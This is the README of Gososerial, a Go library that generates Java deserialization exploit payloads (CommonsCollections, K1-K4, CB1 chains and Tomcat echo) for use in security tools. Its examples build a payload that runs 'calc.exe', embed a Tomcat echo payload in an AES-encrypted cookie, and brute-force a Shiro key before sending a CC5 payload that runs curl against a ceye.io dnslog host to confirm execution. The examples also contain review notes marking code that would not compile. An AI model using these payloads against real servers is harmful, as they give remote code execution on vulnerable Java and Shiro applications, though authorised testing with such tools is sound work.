Golang的ysoserial库,提供简单的API生成反序列化Payload。支持CC1-CC7,K1-K4和CB1链,支持Tomcat回显Payload生成
参考著名安全工具xray的代码
ysoserial是java反序列化安全方面著名的工具
从二进制层面解析,无需java环境,无需下载ysoserial.jar
输入命令直接获得payload,方便编写安全工具
目前已支持CC1-CC7,K1-K4和CB1链
支持K1和K2的TomcatEcho,HTTP头可自行取名
go get github.com/4ra1n/Gososerial
package main
import (
"fmt"
gososerial "github.com/4ra1n/Gososerial"
)
func main() {
	// Build a CommonsCollections1 (CC1) deserialization payload that carries the
	// command "calc.exe" and print the raw payload bytes. gososerial is the
	// library imported above; it needs no Java runtime (see the README text).
	fmt.Println(gososerial.GetCC1("calc.exe"))
}
package main
import (
gososerial "github.com/4ra1n/Gososerial"
"..."
)
func main() {
	// Tomcat echo check with the CC/K2 chain. The payload is built so that the
	// value of the request header named "Testecho" is reflected into the
	// response header of the same name, while the "Testcmd" header presumably
	// carries a command whose output comes back instead (the two examples
	// below are the author's; compare the results on the right-hand side).
	// Testecho: expr 10 '*' 10 -> Testecho: expr 10 '*' 10
	// Testcmd: expr 10 '*' 10 -> Testcmd: 100
	payload := gososerial.GetCCK2TomcatEcho("Testecho", "Testcmd")
	// req, AESEncrypt, httputil and log are not declared in this listing; the
	// snippet is illustrative rather than runnable as-is.
	// NOTE(review): httputil.sendRequest starts with a lowercase letter, so if
	// httputil is a separate package the identifier is unexported and this call
	// will not compile — confirm the intended helper name.
	req.Cookie = AESEncrypt(payload)
	req.Header["Testecho"] = "gososerial"
	req.Method = "POST"
	resp := httputil.sendRequest(req)
	// The marker value coming back in the same response header is what this
	// example treats as a positive result.
	// NOTE(review): if resp.Header is net/http's Header (map[string][]string),
	// comparing it to a string does not compile; resp.Header.Get("Testecho")
	// would be the matching form — confirm the type of resp.Header.
	if resp.Header["Testecho"] == "gososerial" {
		log.Info("find cck2 tomcat echo")
	}
}
package main
import (
gososerial "github.com/4ra1n/Gososerial"
"..."
)
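func main() {
	// Shiro scan example. The shiro, log and ceye helpers are not declared in
	// this listing, so the snippet is illustrative rather than runnable as-is.
	target := "http://shiro_ip/"
	// Brute-force the Shiro AES key; a nil result means no key matched.
	key := shiro.CheckShiroKey(target)
	if key == nil {
		// The original example only logged on success and then continued with a
		// nil key; without a key the cookie cannot be encrypted, so stop here.
		return
	}
	// NOTE(review): assumes log.Info accepts a format string and that key
	// prints sensibly with %s — confirm against the logger and key type used.
	log.Info("find key: %s", key)
	// Use CommonsCollections5 Payload
	payload := gososerial.GetCC5("curl xxxxx.ceye.io")
	// Send Cookies Encrypted By AES
	shiro.SendPayload(key, payload, target)
	// Receive Results Using Dnslog API
	if ceye.CheckResult("your_ceye_token") {
		log.Info("find shiro!")
	}
}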
注意:测试时打印 false 属于正常现象,并不是错误,因为我对类名等信息做了随机化处理
参考xray作者phith0n和koalr师傅的代码
未经授权许可使用Gososerial攻击目标是非法的
本程序应仅用于授权的安全测试与研究目的